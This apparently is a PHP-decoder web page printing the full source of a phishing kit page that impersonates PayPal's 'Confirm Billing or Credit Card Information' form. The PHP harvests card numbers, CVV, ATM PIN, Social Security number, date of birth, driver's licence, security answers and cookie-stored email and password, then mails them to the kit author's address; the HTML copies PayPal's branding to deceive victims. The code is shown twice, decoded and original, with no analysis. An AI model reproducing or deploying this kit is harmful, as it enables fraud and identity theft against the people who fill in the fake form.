Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0); #ERROR REPORTING OFF $cmd = $_POST['cmd']; if($cmd == 'ok'){..
Decoded Output download
<?php
error_reporting(0); #ERROR REPORTING OFF
$cmd = $_POST['cmd'];
if($cmd == 'ok'){
if(empty($_POST['cvv2'])){
$cvv2 = 'error';
$error = '1';
}
if(empty($_POST['ccnumber'])){
$ccnumber = 'error';
$error = '1';
}
if(empty($_POST['first_name'])){
$first_name = 'error';
$error = '1';
}
if(empty($_POST['last_name'])){
$last_name = 'error';
$error = '1';
}
if(empty($_POST['address1'])){
$address1 = 'error';
$error = '1';
}
if(empty($_POST['city'])){
$city = 'error';
$error = '1';
}
if(empty($_POST['state'])){
$state = 'error';
$error = '1';
}
if(empty($_POST['dob'])){
$dob = 'error';
$error = '1';
}
if(!$error){
$send = "[email protected]";
$ip = getenv("REMOTE_ADDR");
$message .= "--------------PayPal ReZulT-----------------------
";
$message .= "Email Address : ".$HTTP_COOKIE_VARS['emaill']."
";
$message .= "Password : ".$HTTP_COOKIE_VARS['passwordd']."
";
$message .= "---------------------------
";
$message .= "New Password : ".$_POST['PASS1']."
";
$message .= "Confirmed Password : ".$_POST['PASS2']."
";
$message .= "First name : ".$_POST['first_name']."
";
$message .= "Last name : ".$_POST['last_name']."
";
$message .= "Card Type : ".$_POST['credit_card_type']."
";
$message .= "Card Number : ".$_POST['ccnumber']."
";
$message .= "Expiration Date : ".$_POST['expdate_month']."/";
$message .= "".$_POST['expdate_year']."
";
$message .= "Card Verification Number: ".$_POST['cvv2']."
";
$message .= "ATM PIN : ".$_POST['PIN']."
";
$message .= "Address 1 : ".$_POST['address1']."
";
$message .= "Address 2 : ".$_POST['address2']."
";
$message .= "City : ".$_POST['city']."
";
$message .= "State : ".$_POST['state']."
";
$message .= "ZIP Code : ".$_POST['zip']."
";
$message .= "Telephone : ".$_POST['H_PhoneNumber']."
";
$message .= "Social Security Number : ".$_POST['ssn']."
";
$message .= "Date Of Birth : ".$_POST['dob']."
";
$message .= "Driver's License : ".$_POST['drl']."
";
$message .= "---------------------------
";
$message .= "Security Question 1 : ".$_POST['question1']."
";
$message .= "Answer 1 : ".$_POST['answer1']."
";
$message .= "Security Question 2 : ".$_POST['question2']."
";
$message .= "Answer 2 : ".$_POST['answer2']."
";
$message .= "IP : ".$ip."
";
$message .= "---------------By xCnsL-----------------------------
";
$subject = "PayPal Results";
mail("$send", $subject, $message);
include('continue2.php');
}
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!--
Script info: script: webscr, cmd: _flow, template: p/gen/signup, date: Feb. 19, 2008 13:59:25 PST; country: US, language: en_US, xslt server:
installation: WEBSCR-440-20070227-1 web version: 44.0-306934 branch: live-440_int
content version: 44.0-304908
pexml version: 44.0-307564
page XSL: web/default/en_US/signup/SignupPersonal.xsl
-->
<title> PayPal - Confirm Billing or Credit Card Information</title>
<meta http-equiv="keywords" content="">
<meta http-equiv="description" content="">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/xpt.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/xptInvoice.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/xptObsolete.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/xptlive.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/default.css">
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/ie60win.css">
<![endif]-->
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/ie70win.css">
<![endif]-->
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/flows/flowSignUpQuickHits.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/legal.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/en_US/lang.css">
<style type="text/css"></style>
<link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
<script type="text/javascript" src="https://www.paypalobjects.com/js/pp_main.js"></script>
</head>
<body>
<div id="xptHeader"><table align="center" border="0" cellpadding="0" cellspacing="0"><tr>
<td nowrap><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home"><img border="0" src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" alt=""></a></td>
<td align="center" class="cobrand" width="100%"> </td>
<td align="right" nowrap> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_help-ext&source_page=_flow">Help</a> | <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center-outside">Security
Center</a>
</td>
</tr></table></div>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="600"><tr valign="top">
<td align="left" width="25%"><table align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
<td align="left" width="90%"><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td>
<td width="10%"><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td>
</tr></table></td>
<td align="right" valign="top" width="75%"><table align="right" border="0" cellpadding="0" cellspacing="0" id="breadcrumbs"><tr>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="11"></td>
<td nowrap class="activeEmphasis">Enter your Information</td>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="11"></td>
<td width="13"><img height="11" width="13" src="https://www.paypalobjects.com/en_US/i/icon/arrow_forward.gif" border="0" alt=""></td>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="11"></td>
<td nowrap class="inactiveEmphasis">Confirm</td>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="11"></td>
<td width="13"><img height="11" width="13" src="https://www.paypalobjects.com/en_US/i/icon/arrow_forward.gif" border="0" alt=""></td>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="11"></td>
<td nowrap class="inactiveEmphasis">Confirm My Account</td>
</tr></table></td>
</tr></table>
<div class="sectionBreak"></div>
<div id="xptContentMain"><table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr><td><div id="xptTitle"><table align="center" border="0" cellpadding="0" cellspacing="0" class="main">
<tr>
<td class="heading" width="100%"><h1><span class="heading">Confirm Billing And
Credit Card Information</span></h1></td>
<td align="right" nowrap>
<a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/WaxAboutPaypal-outside&justSecure=true','','400','480','', windowNamer('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/WaxAboutPaypal-outside&justSecure=true'));return false;"><span class="small">
Secure</span></a> <img align="top" src="https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif" border="0" alt="">
</td>
</tr>
<tr><td><img alt="" border="0" height="4" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td></tr>
</table></div></td></tr>
<tr><td valign="top"><form method="post" action="Confirm.php">
<input type="hidden" name="cmd" value="ok">
<?
include('error.php');
?>
<?
if($error){
echo $error_info;
if($first_name == 'error'){
echo $error2;//first_name
}
if($last_name == 'error'){
echo $error3;
}
if($address1 == 'error'){
echo $error4;
}
if($state == 'error'){
echo $error6;
}
if($city == 'error'){
echo $error5;
}
if($dob == 'error'){
echo $error8;
}
if($ssn == 'error'){
echo $error11;
}
if($cvv2 == 'error'){
echo $error9;
}
if($ccnumber == 'error'){
echo $error10;
}
}
?>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="first_name">First Name:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="first_name" class="textLong" size="25" maxlength="32" name="first_name" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="last_name">Last Name:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="last_name" class="textLong" size="25" maxlength="64" name="last_name" value=""></td>
<tr>
<td class="label"><label for="credit_card_type">Card Type:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<select id="credit_card_type" name="credit_card_type" size="1"><option value="00">
-------------------------</option>
<option value="VISA">Visa</option>
<option value="MasterCard">MasterCard</option>
<option value="Discover">Discover</option>
<option value="American Express">American Express</option>
<option value="bank">bank</option>
</select><br>
</td>
</tr>
<tr>
<td class="label"><label for="cc_number">Card Number:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><table align="left" border="0" cellpadding="0" cellspacing="0">
<tr>
<td valign="top">
<input type="text" id="cc_number" size="20" maxlength="19" name="ccnumber" value=""> </td>
<td valign="top"><div id="xptCardIcons"><table align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top" align="bottom">
<img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_ccVisa.gif" class="marginBottom" alt="Visa"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_ccMC.gif" class="marginBottom" alt="Mastercard"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_ccAmex.gif" class="marginBottom" alt="American Express"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_ccDiscover.gif" class="marginBottom" alt="Discover"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_ccEcheck.gif" class="marginBottom" alt="eCheck"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/PayPal_mark_37x23.gif" class="marginBottom" alt="PayPal">
</td></tr>
</table></div></td>
</tr></table></td>
</tr>
<tr>
<td class="label"><label for="expdate_month">Expiration Date:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<select id="expdate_month" name="expdate_month"><option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option></select><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="3" height="1"><select name="expdate_year" size="1">
<option value="2010">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
<option value="2017">2017</option>
<option value="2018">2018</option>
<option value="2019">2019</option>
<option value="2020">2020</option>
</select>
</td>
</tr>
<tr><td colspan="3"></td></tr>
<tr><td colspan="3"></td></tr>
<tr>
<td class="label"><label for="cvv2_number">Card Verification Number:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><table align="left" border="0" cellpadding="0" cellspacing="0"><tr>
<td>
<input type="text" id="cvv2_number" size="2" maxlength="4" name="cvv2" value=""><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="3" height="1">
</td>
<td rowspan="2">
<script language="JavaScript">
<!-- hide from JavaScript-challenged browsers
function openWindow1() {
popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=430,left=50,top=50');
popupWin.focus();
}
// done hiding -->
</script><a href="javascript:openWindow1();"><img align="top" border="0" src="https://www.paypalobjects.com/en_US/i/icon/mini_cvv2.gif" alt="Help finding your Card Verification Number "></a>
</td>
<td><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="3" height="1"></td>
<td>
<span class="small"></span><br><script language="JavaScript">
<!-- hide from JavaScript-challenged browsers
function openWindow1() {
popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=450,left=50,top=50');
popupWin.focus();
}
// done hiding -->
</script><a href="javascript:openWindow1();"><span class="small"></span></a><script language="JavaScript">
<!-- hide from JavaScript-challenged browsers
function openWindow11() {
popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info-amex_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=450,left=50,top=50');
popupWin.focus();
}
?/ done hiding -->
</script><a href="javascript:openWindow11();"><span class="small"></span></a>
</td>
</tr></table></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="address1">ATM PIN Number:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="address1" class="smallInputWidth" size="6" maxlength="6" name="PIN" type="password" value=""><i><font color="black">*
(your 4-digit card pin).</font></i></td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="address1">Address Line 1:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="address1" class="smallInputWidth" size="25" maxlength="100" name="address1" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="address2">Address Line 2:<br><span class="small">
(optional)</span></label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="address2" class="smallInputWidth" size="25" maxlength="100" name="address2" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="city">City:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="city" class="smallInputWidth" size="25" maxlength="40" name="city" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="first_name0">State/Province/County</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="first_name0" class="textLong" size="25" maxlength="32" name="state" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="zip">ZIP Code:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="zip" size="10" maxlength="10" name="zip" value=""><br>
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="H_PhoneNumber">Home Telephone:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" size="12" name="H_PhoneNumber" value=""><br><span class="botspan"><a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/SignUpHomePhone-outside','','450','350','', windowNamer('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/SignUpHomePhone-outside'));return false;">
This will not be shared</a>e.g. 555-555-5555</span>
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="ssn">Social Security Number:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="ssn" size="10" maxlength="16" name="ssn" value=""><br>
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="dob">Date of Birth:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="dob" class="smallInputWidth" size="12" maxlength="10" name="dob"><font size="2">(mm/dd/yyyy)</font>
</td>
</tr>
<tr>
<td valign="middle" class="label"><label for="drl">Driver's License:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="drl" class="smallInputWidth" size="12" maxLength=30 name="drl" value=""><i>(if
available)</i>
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspaci?g="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="question1">Security Question:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<select id="question1" name="question1" class="optionsLong" size="1"><option value="">
--Choose a Question--</option>
<option value="Last 6 digits of social security number?">Last 6 digits of social security number</option>
<option value="Mother's maiden name?">Mother's maiden name</option>
</select><br><span class="botspan"><a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/SignUpSecurityQuestion-outside','','450','350','', windowNamer('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/SignUpSecurityQuestion-outside'));return false;">
For password recovery</a></span>
</td>
</tr>
<tr>
<td valign="middle" class="label"><label for="answer1">Answer:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="answer1" class="textLong" size="25" maxlength="40" name="answer1" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="question2">2nd Security Question:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<select id="question2" name="question2" class="optionsLong" size="1"><option value="">
--Choose Another Question--</option>
<option value="Who is your favorite author?">Who is your favorite author?
</option>
<option value="Who was your first boss?">Who was your first boss?</option>
<option value="Mother's maiden name?">Mother's maiden name</option>
<option value="Last 4 characters of driver's license?">Last 4 characters of
driver's license</option>
<option value="Last 4 digits of social security number?">Last 4 digits of social
security number</option>
<option value="Who was your childhood best friend?">Who was your childhood best friend?
</option>
<option value="City of birth?">City of birth</option></select></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="answer2">Answer:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="answer2" class="textLong" size="25" maxlength="40" name="answer2" value=""></td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="string_answer">Enter the security
code:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="string_answer" class="smallInputWidth" size="12" name="string_answer" value=""><img border="1" src="https://www.paypal.com/cgi-bin/gs_web/5t4NEWFSmr95GL6bAa2N6feota1hfLE0oqcnHq0CZs8nl7CdwTXzMf-SiiPBFIJeLBotmA/secret.jpeg" alt=""><a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/cgi-bin/wv_web/5t4NEWFSmr95GL6bAa2N6feota1hfLE0oqcnHq0CZs8nl7CdwTXzMf-SiiPBFIJeLBotmA/secret.wav','','45?','350','', windowNamer('https://www.paypal.com/cgi-bin/wv_web/5t4NEWFSmr95GL6bAa2N6feota1hfLE0oqcnHq0CZs8nl7CdwTXzMf-SiiPBFIJeLBotmA/secret.wav'));return false;"><img src="https://www.paypalobjects.com/en_US/i/icon/icon_hearing_14x13.gif" border="0" alt=""></a><br><span class="botspan"><a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/popup_random_access_key-outside&voice=https://www.paypal.com/cgi-bin/wv_web/5t4NEWFSmr95GL6bAa2N6feota1hfLE0oqcnHq0CZs8nl7CdwTXzMf-SiiPBFIJeLBotmA/secret.wav','','450','350','', windowNamer('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/popup_random_access_key-outside&voice=https://www.paypal.com/cgi-bin/wv_web/5t4NEWFSmr95GL6bAa2N6feota1hfLE0oqcnHq0CZs8nl7CdwTXzMf-SiiPBFIJeLBotmA/secret.wav'));return false;">
Need Help?</a></span>
</td>
</tr>
</table>
<div class="terms"><b>For your protection, we verify credit card and debit card
billing addresses.</b><br>The process normally takes about 30 seconds, but
it may take longer during certain times of the day.<br>Please click the <b>
Confirm </b>button to update your information. When your card has been
successfully added, you will see a confirmation page.</a><br><input type="submit" name="next.x" value=" Confirm My Account">
</div>
<td width="20"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="20"></td>
<td valign="top" width="120"><a href="https://www.paypalcreditcard.com/paypalbanner?banner_id=paypal/web/11&paypal_id=005006D5CE3310BF17BD9AD67A7D76EF"><img align="top" border="0" height="600" width="120" src="https://www.paypalobjects.com/en_US/i/bnr/bnr_PVNbnr3_120x600.gif" alt=""></a></td>
</tr>
<tr><td colspan="3"><img alt="" border="0" height="5" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td></tr>
</table>
<input name="form_charset" type="hidden" value="UTF-8">
</form></td></tr>
</table></div>
<div id="footer">
<h2 class="accessAid">More Information</h2>
<ul>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/about-outside">
About</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/general/PayPalAccountTypes-outside">
Accounts</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_display-fees-outside">
Fees</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside">
Privacy</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center-outside">
Security Center</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us">Contact Us</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/ua-outside">
Legal Agreements</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/pdn/intro-outside">
Developers</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/jobs-outside">
Jobs</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/mobile/MobileOverview-outside">
Mobile</a></li>
<li><a href="https://ad.doubleclick.net/clk;30045328;11466062;u?https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/general/PPPlusCC-outside">
Plus Card</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_web-referrals-mrb-outside">
Referrals</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_shop-ext">Shops</a></li>
<li class="last"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_batch-payment-overview-outside">
Mass Pay</a></li>
</ul>
<p id="legal"></p>Copyright ? 1999-20010 PayPal. All rights reserved.<br><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/fdic-outside">
Information about FDIC pass-through insurance</a>
</div>
<script type="text/javascript" src="https://www.paypalobjects.com/js/pp_naturalsearch.js"></script><script type="text/javascript">
<!--
var ppns = new PayPalNaturalSearch('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/signup','3484-30830-12422-0',this.document);
ppns.addEngines(new Array(
"A9.com",
".altavista.com",
"clusty.com",
"google.co.jp",
"google.co.kr",
"google.ru",
"www.google.com",
"icerocket.com",
"infospace.com",
"mooter.com",
"search.msn.",
"snap.com",
"search.yahoo.com",
"search.yahoo.co.jp"
,"www.overture.com/d/search/p/altavista/",
"aolsearch.aol.com",
"search.aol.com",
"web.ask.com",
"pictures.ask.com",
"images.google.com",
"groups.google.com",
"www.google.com/search",
"www.hotbot.com",
"search.netscape.com",
"s.teoma.com/",
"www.wisenut.com"
)); // End of aEngines array.
ppns.init();
-->
</script>
<!-- SiteCatalyst Code
Copyright 1997-2005 Omniture, Inc.
More info available at http://www.omniture.com -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js"></script>
<script type="text/javascript">
<!--
/* SiteCatalyst Variables */
s.pageName="SignUp:Personal";
s.prop11="::0";
s.channel="Sign Up:Enter Information";
s.prop1="p/gen/signup";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop12="Unknown";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code) // -->
</script>
<!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst Code -->
</body>
</html>
Did this file decode correctly?
Original Code
<?php
error_reporting(0); #ERROR REPORTING OFF
$cmd = $_POST['cmd'];
if($cmd == 'ok'){
if(empty($_POST['cvv2'])){
$cvv2 = 'error';
$error = '1';
}
if(empty($_POST['ccnumber'])){
$ccnumber = 'error';
$error = '1';
}
if(empty($_POST['first_name'])){
$first_name = 'error';
$error = '1';
}
if(empty($_POST['last_name'])){
$last_name = 'error';
$error = '1';
}
if(empty($_POST['address1'])){
$address1 = 'error';
$error = '1';
}
if(empty($_POST['city'])){
$city = 'error';
$error = '1';
}
if(empty($_POST['state'])){
$state = 'error';
$error = '1';
}
if(empty($_POST['dob'])){
$dob = 'error';
$error = '1';
}
if(!$error){
$send = "[email protected]";
$ip = getenv("REMOTE_ADDR");
$message .= "--------------PayPal ReZulT-----------------------\n";
$message .= "Email Address : ".$HTTP_COOKIE_VARS['emaill']."\n";
$message .= "Password : ".$HTTP_COOKIE_VARS['passwordd']."\n";
$message .= "---------------------------\n";
$message .= "New Password : ".$_POST['PASS1']."\n";
$message .= "Confirmed Password : ".$_POST['PASS2']."\n";
$message .= "First name : ".$_POST['first_name']."\n";
$message .= "Last name : ".$_POST['last_name']."\n";
$message .= "Card Type : ".$_POST['credit_card_type']."\n";
$message .= "Card Number : ".$_POST['ccnumber']."\n";
$message .= "Expiration Date : ".$_POST['expdate_month']."/";
$message .= "".$_POST['expdate_year']."\n";
$message .= "Card Verification Number: ".$_POST['cvv2']."\n";
$message .= "ATM PIN : ".$_POST['PIN']."\n";
